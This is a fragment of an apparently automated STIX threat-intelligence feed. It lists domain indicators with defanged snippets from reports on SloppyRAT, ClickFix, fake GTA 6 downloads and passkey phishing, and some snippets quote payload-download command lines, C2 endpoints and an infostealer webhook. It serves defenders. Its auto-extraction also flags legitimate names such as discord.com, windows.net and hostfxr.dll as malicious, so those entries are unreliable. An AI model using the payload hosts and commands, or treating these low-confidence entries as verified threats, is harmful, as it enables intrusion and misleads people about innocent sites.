Affairs","url":"https://securityaffairs.com/198864/hacking/uk-council-attack-linked-to-mass-exploitation-of-sonicwall-flaw.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a8345c67-ee77-4784-80f4-84cd84aeae3d","created":"2026-09-11T06:17:07.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: linked4x.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (GBHackers). Context: irectories. Security teams should also hunt for the domains linked4x[.]com , skipraid[.]com , and the observed Azure Blob Storage pa","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-11T06:17:07.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-new-sloppyrat-via-clickfix-to-enable-ransomware-lateral-movement/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eb13942f-e57d-41ba-87fb-b39e107627eb","created":"2026-09-11T06:17:07.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: skipraid.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (GBHackers). Context: the download of CastleLoader and CastleRAT components from skipraid[.]com , using the distinctive K8VGmQTrzX User-Agent string. Cas","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-11T06:17:07.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-new-sloppyrat-via-clickfix-to-enable-ransomware-lateral-movement/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25712631-07df-4ea1-badd-4f27e5a01b75","created":"2026-09-10T19:04:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gitclone.org","description":"Seen in \"Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329\" (Wiz Blog). Context: -2026-42018/CVE-2026-42016 2026-08-28 2026-09-07 hxxp://log.gitclone[.]org:45678/smtp Payload download after CVE-2026-42018/CVE-2026","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-10T19:04:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Wiz Blog","url":"https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0ecd02b-79a4-40d3-af94-432ffb307fe8","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: domainlify.net","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: also registered another domain on the same day. The domain domainlify[.]net was used in the Reply-To email. Figure 7. Account informa","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aa9f153c-bb5a-4020-a6da-96209ee0c7b1","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: eemusicclass.co.uk","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: uerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c395507c-0bca-43cc-b173-1b3fbf952dad","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lifeones.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address used to send out email","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d61418e-63c0-49ec-8a23-466a175c3bc2","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: umalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk inf","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--203a67ef-ce2c-474b-b092-b579be15244d","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lumalisboa.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhil","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71e91896-e31f-4d03-9b2e-f884a1d1154e","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mctci.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: k info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f3916ee-5a23-48db-9d9a-0b23dacd1969","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nuf.co.jp","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: th[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbati","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--309234d3-c444-4ef4-aac0-2f2d1383480b","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: service-nowinc.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: registered several domains. A ‘ServiceNow’ lookalike domain service-nowinc[.]com was registered on July 31, shortly before the campaign ac","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c2f006f6-d16b-4f40-a394-bacf4c3884d3","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: tivityhealth.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dcabfe4f-414f-424b-b19d-686a95f49c40","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: tovimbatista.pt","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7acca9f-d3c9-47b5-995a-63aad53c932d","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: uinsure.co.uk","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ss Email address associated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com norep","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e897333d-f117-4345-a809-96b65a6cc481","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 9342371634011778.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: following command line: \"C:\\Users\\[redacted]\\AppData\\Local\\9342371634011778.com\" -s -L --tlsv1.2 --ssl-no-revoke -o \"C:\\Users\\[redacted]\\Ap","pattern":"[domain-name:value = '9342371634011778.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d298a829-3fd3-4858-bf57-cb0c0e81c388","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hostfxr.dll","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: from hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll and invoked the DLL export name f3b980dea . The config.py","pattern":"[domain-name:value = 'hostfxr.dll']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65b25366-69e3-4dee-9be5-1078c1fa9600","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: linked4x.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: nger.exe to download and execute a batch script from finger.linked4x[.]com as shown in the command line below: \"C:\\windows\\system32\\","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ebecbf2-4c9e-46ab-a0f7-ab784ad32f37","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: skipraid.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: CastleLoader and CastleRAT components were downloaded from skipraid[.]com using the User-Agent string K8VGmQTrzX . Alongside Castle","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--606d02c0-2278-470d-b57d-b354fcdce2b4","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: stro7121.blob.core.windows.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: mory. This script downloaded a SloppyRAT DLL from hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll and invoked the DLL export name","pattern":"[domain-name:value = 'stro7121.blob.core.windows.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0347e4f2-e89f-4038-8b63-adf8f0192cc0","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: system.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: ieve the number of milliseconds since boot. GetTickCount64 [System.Net.Dns]::GetHostName() / domain — Retrieves the host name or d","pattern":"[domain-name:value = 'system.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2eae708a-4c5c-4909-982d-a067555997f9","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: windows.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: and execute a Python script from hxxps://stro7121.blob.core.windows[.]net/dpp1/config.py . SloppyRAT stager The config.py script’s","pattern":"[domain-name:value = 'windows.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05ddff7c-6a29-4880-b162-6dcc8c01ceb6","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 7.tcp.eu","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 67.15[.]169 Infrastructure contacted by NJRAT Domain / Port 7.tcp.eu.ngrok[.]io:12684 ngrok endpoint contacted by NJRAT File nam","pattern":"[domain-name:value = '7.tcp.eu']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15108443-c74d-43cc-89f9-488c91766c94","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: discord.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 41cf9a0d26 Mercurial Grabber infostealer binary URL https://discord[.]com/api/webhooks/995445114254139543/NmpxQmuBCD6sm3UkVvupGtx-Y","pattern":"[domain-name:value = 'discord.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e136594f-14e0-47b0-bb8c-4619e1840b1f","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: flow.lavasoft.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: le-analytics.l.google.com 0.0.0.0 static.hotjar.com 0.0.0.0 flow.lavasoft.com 0.0.0.0 telemetry.servers.getgo.com 0.0.0.0 telemetry.malwa","pattern":"[domain-name:value = 'flow.lavasoft.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--338a8063-4b69-4a54-80f6-d2fa5d8d9d73","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mobile-service.segment.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: .com 0.0.0.0 cdn.segment.com 0.0.0.0 api.segment.io 0.0.0.0 mobile-service.segment.com Entries added to the Windows hosts file by DCRAT Domain / I","pattern":"[domain-name:value = 'mobile-service.segment.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--58e71061-e9df-4552-8ebd-2f7438fabdf6","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ngrok.io","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 69 Infrastructure contacted by NJRAT Domain / Port 7.tcp.eu.ngrok[.]io:12684 ngrok endpoint contacted by NJRAT File names / MD5","pattern":"[domain-name:value = 'ngrok.io']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31061696-6073-4289-82de-8ae45da24d8e","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: telemetry.servers.getgo.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 0.0.0.0 static.hotjar.com 0.0.0.0 flow.lavasoft.com 0.0.0.0 telemetry.servers.getgo.com 0.0.0.0 telemetry.malwarebytes.com 0.0.0.0 ws.mcafee.com 0.","pattern":"[domain-name:value = 'telemetry.servers.getgo.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce01abe7-0ad3-47ca-9f3c-0b42151cf7ab","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xsph.ru","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: he Windows hosts file by DCRAT Domain / IP address a0700877.xsph[.]ru 141.8.197[.]42 DCRAT command-and-control infrastructure F","pattern":"[domain-name:value = 'xsph.ru']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e0367a2-743e-44e0-8156-eb7523215fe2","created":"2026-09-10T14:04:56.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bloom.io","description":"Seen in \"Hackers Use Blob URLs and Microsoft Teams to Create Phishing Pages Inside Victims’ Browsers\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description Domain cdn.bloom[.]io External resource host loaded through the Microsoft Teams","pattern":"[domain-name:value = 'bloom.io']","pattern_type":"stix","valid_from":"2026-09-10T14:04:56.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-use-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--816dc3f8-5361-45bc-8a26-d333c35117bc","created":"2026-09-10T14:04:56.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: login.microsoftonline.com","description":"Seen in \"Hackers Use Blob URLs and Microsoft Teams to Create Phishing Pages Inside Victims’ Browsers\" (Cyber Security News). Context: st loaded through the Microsoft Teams redirect chain Domain login.microsoftonline.com Legitimate Microsoft OAuth endpoint used in the initial red","pattern":"[domain-name:value = 'login.microsoftonline.com']","pattern_type":"stix","valid_from":"2026-09-10T14:04:56.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-use-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e7dfef5-de3d-4054-9029-c75c2d972a8a","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: add-passkey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: y security Domain setupmypasskey[.]com Passkey setup Domain add-passkey[.]com Passkey enrollment Domain integratedsso[.]com SSO Domain","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15fc8871-38f4-4fdf-85fc-ccbeb73f9f25","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: integratedsso.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: ey setup Domain add-passkey[.]com Passkey enrollment Domain integratedsso[.]com SSO Domain oktasession[.]com Identity-provider session Do","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a32a86c-8257-41c2-a7b5-7b7e1871ba79","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: keysyncos.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: O Domain oktasession[.]com Identity-provider session Domain keysyncos[.]com Key synchronization Domain oskeysync[.]com Key synchroniz","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--abfa34f1-f70d-40f1-89c1-689774833338","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: myconnectkey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: istration Domain syncmykey[.]com Key synchronization Domain myconnectkey[.]com Key connection Domain oskeyconnect[.]com Key connection D","pattern":"[domain-name:value = 'myconnectkey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--62ddd644-f5c2-49e3-a947-846bf335118e","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oktasession.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: om Passkey enrollment Domain integratedsso[.]com SSO Domain oktasession[.]com Identity-provider session Domain keysyncos[.]com Key sync","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security 